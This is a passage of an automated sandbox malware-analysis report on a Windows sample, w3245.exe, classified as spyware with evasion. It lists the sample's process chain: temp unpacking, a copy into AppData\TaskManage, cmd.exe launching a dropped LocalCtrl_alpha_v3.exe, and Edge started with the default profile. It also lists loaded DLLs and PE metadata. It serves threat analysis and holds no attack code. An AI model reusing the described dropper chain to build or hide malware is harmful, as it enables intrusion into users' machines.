Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4BEE043_2_6B4BEE04
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: 3_2_6B4BE15E3_2_6B4BE15E
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 00940237 appears 683 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 009432F3 appears 83 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 00903821 appears 501 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 00940726 appears 34 times
Source: C:\Users\user\Desktop\w3245.exeCode function: String function: 00901F13 appears 54 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B4C378B appears 100 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B3E0C80 appears 152 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B3E0C67 appears 73 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B3EA51F appears 38 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B4C3753 appears 191 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B3EB046 appears 63 times
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeCode function: String function: 6B4C37C6 appears 50 times
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeCode function: String function: 6BBF9A30 appears 66 times
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: String function: 00C81F13 appears 54 times
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: String function: 00CC32F3 appears 83 times
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: String function: 00CC0237 appears 685 times
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: String function: 00CC0726 appears 34 times
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: String function: 00C83821 appears 500 times
Source: LocalCtrl_alpha_v3.exe.4.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
Source: hsiywoxwiypiaj.4.drStatic PE information: Number of sections : 12 > 10
Source: eykunyxpxybnsa.11.drStatic PE information: Number of sections : 12 > 10
Source: w3245.exe, 00000000.00000000.1694798990.000000000096D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exe, 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameSQLUNIRL.DLLJ vs w3245.exe
Source: w3245.exe, 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenameconn.exe8 vs w3245.exe
Source: w3245.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: classification engineClassification label: mal76.spyw.evad.winEXE@72/361@21/15
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0093FE21 FormatMessageW,GetLastError,LocalFree,0_2_0093FE21
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_009045EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_009045EE
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_00C845EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,1_2_00C845EE
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: _CreateService_@52,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CreateServiceA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42A14
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_0094304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_0094304F
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB37CC0 _FindResource@12,FindResourceW,newMultiByteFromWideChar,newMultiByteFromWideChar,FindResourceA,GlobalFree,GlobalFree,1_2_5BB37CC0
Source: C:\Users\user\Desktop\w3245.exeCode function: 0_2_00926B88 ChangeServiceConfigW,GetLastError,0_2_00926B88
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCode function: 1_2_5BB439D2 _StartServiceCtrlDispatcher_@4,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,StartServiceCtrlDispatcherA,MultiByteToWideChar,GlobalFree,GlobalFree,1_2_5BB439D2
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeFile created: C:\Users\user\AppData\Roaming\TaskManageJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Users\user\Desktop\w3245.exeFile created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\Jump to behavior
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: cabinet.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: msi.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: version.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: wininet.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: comres.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: clbcatq.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: msasn1.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: crypt32.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: feclient.dll0_2_00901070
Source: C:\Users\user\Desktop\w3245.exeCommand line argument: cabinet.dll0_2_00901070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: cabinet.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: msi.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: version.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: wininet.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: comres.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: clbcatq.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: msasn1.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: crypt32.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: feclient.dll1_2_00C81070
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeCommand line argument: cabinet.dll1_2_00C81070
Source: w3245.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeSystem information queried: HandleInformation
Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\w3245.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: w3245.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: w3245.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
Source: C:\Users\user\Desktop\w3245.exeFile read: C:\Users\user\Desktop\w3245.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\w3245.exe "C:\Users\user\Desktop\w3245.exe"
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeProcess created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe "C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe"
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Users\user\Desktop\w3245.exeProcess created: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe "C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exe" -burn.clean.room="C:\Users\user\Desktop\w3245.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692 Jump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeProcess created: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exe C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeJump to behavior
Source: C:\Windows\Temp\{7CEE328D-709D-46B2-B311-5917A7EA14A8}\.ba\RescueCDBurner.exeProcess created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1980,i,14784043117474670596,10515819180786233861,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1996 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6740 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7228 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=5752 --field-trial-handle=2092,i,4914835570454536205,3662400775575859441,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1516 --field-trial-handle=2100,i,1290917253854219451,795298086300262693,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=952 --field-trial-handle=1852,i,10935174027407288712,12025004199992672972,262144 /prefetch:3
Source: C:\Users\user\Desktop\w3245.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: feclient.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\w3245.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: feclient.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\Temp\{555CA19E-1428-40AD-9391-D8257758E5AA}\.cr\w3245.exeSection loaded: wintypes.dllJump to behavior
